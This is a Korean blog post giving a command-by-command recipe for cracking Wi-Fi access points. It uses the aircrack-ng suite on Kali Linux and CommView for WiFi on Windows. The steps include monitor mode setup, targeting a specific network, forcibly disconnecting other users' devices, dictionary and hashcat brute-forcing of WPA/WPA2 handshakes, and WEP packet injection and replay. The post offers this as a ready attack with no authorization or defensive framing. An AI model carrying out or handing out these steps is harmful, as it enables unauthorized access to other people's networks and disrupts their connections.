-
Kali linux를 이용한 AP 해킹 (+windows)Hack/No filtered 2021. 1. 12. 09:42
iwconfig
ifconfig wlan0 down
[모니터 모드 전환]
airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료
airmon-ng start wlan0
iwconfig
[주변 무선랜 스캔]
airodump-ng wlan0mon
[타겟 설정]
airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename]
[강제로 다른 사용자 연결 해제]
aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소]
[사전 대입, wpa wpa2]
aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt
[hashcat 사용]
cap 파일을 hccapx로 확장자 변환
#cap2hccapx.bin [cap file] [hccapx file]
#hashcat -m 2500 -a 3 --force [hccapx file] 0000?d?d?d?d
: "wpa2로 암호화되어있으며, 0000뒤에 숫자4글자인 비밀번호를 bruteforce해라." 라는 의미
기존에 나온 결과 값을 참고하기 위해 --show 옵션 사용 가능
[wep 사용시]
aireplay-ng wlan0mon -1 0 -a [ap 맥주소] -h [랜카드 맥주소] : 패킷인젝션
aireplay-ng wlan0mon -3 -b [ap 맥주소] -h [랜카드 맥주소] : apr request replay 다량의 패킷 유발
data 35000개 이상 모은 후에
aircrack-ng -b [AP 맥주소] [cap file] 실행
안되면 5000개씩 data를 자동으로 더모으고 크랙을 시도함
[windows 환경]
- commview for wifi 설치
- logging 설정 : auto_saving, 200000, 100
- 재생버튼 클릭
- 타겟 설정후 single channel mode로 변경
- 무료버전이므로 위 과정을 수차례 시도하여 데이터 수집
- Log Viewer에서 local commView logs 로드
- export log에서 wireshark tcp dump로 pcap 파일로 변경
>aircrack-ng.exe
index number 입력하면 crack!!
>aircrack-ng.exe -w [password.lst] [name.cap]
'Hack > No filtered' 카테고리의 다른 글
[ios] 패드전용 앱 iphone에 깔기 (0) 2021.01.12 [NAC] Network Access Control 우회 (MAC 탈취 / MAC 고정 ) (1) 2021.01.12 reverse shell summary (0) 2020.04.08 ios 정적 분석 방법 (0) 2020.04.06 Active X 취약점 점검 방법 (with powershell) (0) 2020.04.06